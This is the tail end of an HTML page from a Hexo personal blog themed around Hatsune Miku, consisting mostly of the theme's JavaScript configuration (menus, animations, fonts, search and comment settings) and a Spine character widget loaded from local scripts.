            </div>
            <span class="icontext">跳至底部</span>
        </div>
    </div>
    <div class="wrap-right-show">
        <div class="wrap-right-button set">
            <div class="iconbox">
                <span class="iconfont icon-setting"></span>
            </div>
            <span class="icontext">设置</span>
        </div>
        <div class="wrap-right-button top">
            <div class="iconbox">
                <span class="iconfont icon-top"></span>
            </div>
            <span class="icontext">返回顶部</span>
        </div>
    </div>
</div>
    <div class="loading"></div>
</div>
    <script>
    window.config = {
        GitHubUserName     : "MetaMiku",
        GitHubRepositories : "Hexo-LiveForCode",

        User             : "MetaMiku",
        UserAvatar       : "/image/sidebar/avatar.jpg",
        WebsiteStartDate : "2024-03-09",
        Home             : "metamiku.top",

        WebsiteTitleBlur         : "Live For Miku",
        WebsiteTitleBlurTimeOut  : 500,
        WebsiteTitleFocus        : "欢迎回来awa!",
        WebsiteTitleFocusTimeOut : 1000,
        WebsiteFavicon           : {
            light : "/image/website/logo/logo.png",
            dark  : "/image/website/logo/logo-dark.png"
        },

        ProgressBar : {
            id       : "topProgressBar",
            color    : "#39C5BB",
            height   : "2px",
            duration : 0.2
        },

        Loading: {
            rebound : {
                tension  : 16,
                friction : 5
            },
            spinner : {
                id     : "spinner",
                radius : 90,
                sides  : 3,
                depth  : 4,
                colors : {
                    background : "#F0F0F0",
                    stroke     : "#272633",
                    base       : "",
                    child      : "#272633"
                },
                alwaysForward : true,
                restAt        : 0.5,
                renderBase    : false
            }
        },

        HomeHeaderAnimationRendered : true,
        HomeHeaderAnimation         : {
            radius      : 15,
            density     : 0.2,
            color       : "rgba(255, 255, 255, .2)",
            clearOffset : 0.3
        },

        BackAnimationRendered          : true,
        IEBrowserBackAnimationRendered : false,
        BackAnimation                  : {
            colorSaturation  : "60%",
            colorBrightness  : "50%",
            colorAlpha       : 0.5,
            colorCycleSpeed  : 5,
            verticalPosition : "random",
            horizontalSpeed  : 200,
            ribbonCount      : 3,
            strokeSize       : 0,
            parallaxAmount   : -0.2,
            animateSections  : true
        },

        HomeHeaderImage : [
            
                "/image/header/home_1.jpg",
            
                "/image/header/home_5.jpg",
            
        ],
        HomeBannerText  : "",

        ArticleHeaderImage : [
            
                "/image/header/home_1.jpg",
            
                "/image/header/home_5.jpg",
            
        ],

        OtherBannerText : "",

        Error : {
            icon    : "icon-swimming",
            title   : "PAGE NOT FOUND",
            content : [
                
                    "很抱歉，您访问的页面不存在！",
                
                    "可能是输入地址有误或该地址已变更。",
                
            ],
            buttons : [
                
                    {
                        icon  : "icon-home",
                        text  : "返回首页",
                        href  : "/",
                        class : ""
                    },
                
            ]
        },

        MenuNotice : {
            enable : true,
            notice : "铁血的热血的冷血的",
            speed  : 20
        },
        MenuList : [
            
                {
                    name   : "首页",
                    icon   : "icon-home-fill",
                    href   : "/",
                    type   : "index",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "分类",
                    icon   : "icon-folder-fill",
                    href   : "/category",
                    type   : "category",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "标签",
                    icon   : "icon-discount-fill",
                    href   : "/tag",
                    type   : "tag",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "归档",
                    icon   : "icon-calendar-fill",
                    href   : "/archives",
                    type   : "archives",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "留言板",
                    icon   : "icon-comments-fill",
                    href   : "/comment",
                    type   : "comment",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "友情链接",
                    icon   : "icon-link",
                    href   : "/friend",
                    type   : "friend",
                    class  : "",
                    target : "_self"
                },
            
        ],
        MenuLink : [
            
                
                    {
                        name   : "GitHub",
                        icon   : "icon-github",
                        href   : "https://github.com/MetaMikuAI",
                        class  : "",
                        target : "_blank",
                        image  : ""
                    },
                
            
        ],

        FooterStyle : 2,
        BottomText  : "<div>【MetaMiku—neither self nor Miku, but a flicker between realities in the Meta SEKAI of my pulse.】</div><div>&copy; 2020-2025 MetaMiku. All Rights Reserved.</div>",

        ConsoleList : [
            
                
                    [
                        
                            
                                "Based on cnblogs theme SimpleMemory.",
                            
                                "",
                            
                        
                    ],
                
                    [
                        
                            
                                "SimpleMemory Author:",
                            
                                "BNDong",
                            
                        
                    ],
                
                    [
                        
                            
                                "Theme:",
                            
                                "LiveForCode",
                            
                        
                    ],
                
            
        ],

        FontIconExtend : "",

        Donate : {
            paypal  : "",
            bitcoin : "",
            alipay  : "/image/donate/alipay.png",
            wechat  : "/image/donate/wechat.png"
        },

        Search : {
            applicationID : "EIKN74YZ8H",
            apiKey        : "5cf005ac771b67c63c68650c57e85ec7",
            indexName     : "Notes",
            hits          : {
                page : 10
            },
            labels        : {
                placeholder : "搜索",
                empty       : "未发现与 「${query}」 相关的内容",
                stats       : "${hits} 条相关条目，使用了 ${time} 毫秒",
            }
        }, 

        Comment : {
            switch : true,
            type   : "Valine",
        },

        Waline : {
            el              : ".comments-content",
            serverURL       : "",
            path            : window.location.pathname,
            meta            : "['nick', 'mail', 'link']",
            requiredMeta    : "['nick', 'mail']",
            pageSize        : 10,
            lang            : "zh-cn",
            locale: {
                admin       : "博主",
                anonymous   : "匿名用户",
                sofa        : "快来做第一个评论的人吧 ~",
                placeholder : "你是我一生只会遇见一次的惊喜...",
            },
            dark            : "html[color-scheme='dark']",
            search          : false,
            pageview        : true,
            comment         : true,
            copyright       : false,
        },

        Valine : {
            el             : ".comments-content",
            appId          : "CXK3bqXw8K4aJOe5rBd2xnNY-gzGzoHsz",
            appKey         : "Q0LNpbLGoKsaOr8bPFbE1uCI",
            serverURLs     : "",
            placeholder    : "25時、ナイトコードで。",
            avatar         : "mm",
            meta           : "nick,mail,link",
            requiredFields : "nick,mail",
            pageSize       : 5,
            lang           : "zh-cn",
            visitor        : true,
            enableQQ       : true
        },

        Tocbot : {
            switch                : true,
            tocSelector           : ".toc",
            contentSelector       : ".article-body",
            headingSelector       : "h1, h2, h3, h4, h5",
            headingsOffset        : 0,
            scrollSmooth          : true,
            scrollSmoothOffset    : -5,
            positionFixedSelector : ".toc",
            positionFixedClass    : "toc-fixed",
            fixedSidebarOffset    : "",
        },

        Require : {
            baseUrl     : "/js/",
            waitSeconds : 100
        },

        Mouse : {
            enable  : true,
            options : {
                size  : 6,
                sizeF : 24
            }
        },

        LazyLoad : {
            default : "/image/website/lazyload.svg"
        },
  
        Style : {
            aplayer          : "",
            archive          : "/css/archive.css",
            base             : "/css/base.css",
            clipboard        : "/css/clipboard.css",
            code             : "/css/code.css",
            donate           : "/css/donate.css",
            fancybox         : "/css/jquery.fancybox.css",
            footer           : "/css/footer.css",
            iconfont         : "/iconfont/iconfont.css",
            index            : "/css/index.css",
            menuBubble       : "/css/menu-bubble.css",
            mouse            : "/css/mouse.css",
            page             : "/css/page.css",
            post             : "/css/post.css",
            search           : "/css/search.css",
            tocbot           : "/css/tocbot.css",
            valine           : "/css/valine.css",
            waline           : "/css/waline.css",
            walineCustom     : "/css/waline-custom.css"
        },

        Script: {
            aplayer          : "",
            config           : "/js/require.config.js",
            index            : "/js/index.js",
            instantSearch    : "/js/instantsearch.min.js",
            iscroll          : "/js/iscroll.js",
            jQuery           : "/js/jquery-3.4.1.min.js",
            loading          : "/js/loading.js",
            meting           : "/js/Meting.min.js",
            require          : "/js/require.min.js",
            waline           : "/js/waline.mjs",
            pageview         : "/js/pageview.mjs",
            comment          : "/js/comment.mjs",
        },

        Font: {
            LongCang    : "/font/LongCang.css",
            Monda       : "/font/Monda.css",
            NotoSansSC  : "/font/NotoSansSC.css",
            NotoSerifSC : "/font/NotoSerifSC.css",
            Playball    : "/font/Playball.css",
            PTMono      : "/font/PTMono.css",
            Roboto      : "/font/Roboto.css",
            RobotoSlab  : "/font/RobotoSlab.css",
            Rosario     : "/font/Rosario.css",
            UbuntuMono  : "/font/UbuntuMono.css"
        },

        Suffix : {
            about : "铁血的热血的冷血的."
        },
            
        Theme : {
            url  : "https://github.com/first19326/Hexo-LiveForCode",
            name : "Hexo - Live For Code"
        }  
    };
</script>
    <script type="text/javascript" src="/js/index.js"></script>
<!-- hexo injector body_end start -->
    <div class="myspine-spine-widget"></div>
    <script src="/js/myspine/spine-widget.js"></script>
    <script src="/js/myspine/spine-skeleton-binary.js"></script>
    <script src="/js/myspine/myspine.js"></script>
    <link type="text/css" href="/css/myspine/myspine.css"></link>
    <script>
        new MySpine({
            spineDir: "/spine_models/",
            models: [{"name":"miku_night/","skin":"default","atlas":"sekai.atlas","skeleton":"sekai.skel"}],
            styles: {"widget":{"width":"200px","height":"200px"},"voiceText":{"color":"#e6e6e6"}},
            behaviors: {"start":{"animation":"n_general_walk_01_f","voice":"","text":"Ohhhhh好耶"},"idle":{"maxMinutes":1,"animations":[{"name":"w_pure_joy02_f","loop":false},{"name":"w_pure_joy02_f","loop":false}],"voices":[{"voice":"","text":"不买立省百分百"}]},"interact":{"maxPlaySec":3,"animations":[{"name":"w_pure_joy02_f","loop":false},{"name":"w_cute_doubt01_f","loop":false},{"name":"w_cute_listen01_f","loop":false}],"voices":[{"voice":"","text":"既见未来，为何不buy"}]}}
        });
    </script>
    <!-- hexo injector body_end end --></body>
</html>